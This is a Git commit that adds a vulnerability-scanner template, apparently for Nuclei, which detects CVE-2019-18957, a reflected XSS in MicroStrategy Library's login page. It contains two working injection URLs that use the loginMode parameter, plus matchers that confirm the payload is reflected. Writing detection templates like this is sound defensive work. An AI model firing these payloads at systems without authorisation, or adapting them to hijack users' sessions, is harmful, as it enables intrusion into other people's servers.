Create CVE-2019-18957.yaml

patch-1
Arman 2022-10-10 00:34:13 -04:00 committed by GitHub
parent a1fd989b5b
commit 4a536eb9e1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: CVE-2019-18957
info:
name: Microstrategy Library before 11.1.3 XSS
author: tess
severity: medium
description: |
Microstrategy Library in MicroStrategy before 2019 before 11.1.3 has reflected XSS.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-18957
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18957
- https://www.cvedetails.com/cve/CVE-2019-18957/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-18957
cwe-id: CWE-79
tags: cve,cve2019,microstrategy,xss
requests:
- method: GET
path:
- "{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"
- "{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=1%7d;alert(document.domain);window.loadingPageConfig%20=%20%7bpreviousLoginMode:1"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "previousLoginMode: alert(document.domain)"
- "alert(document.domain);window.loading"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200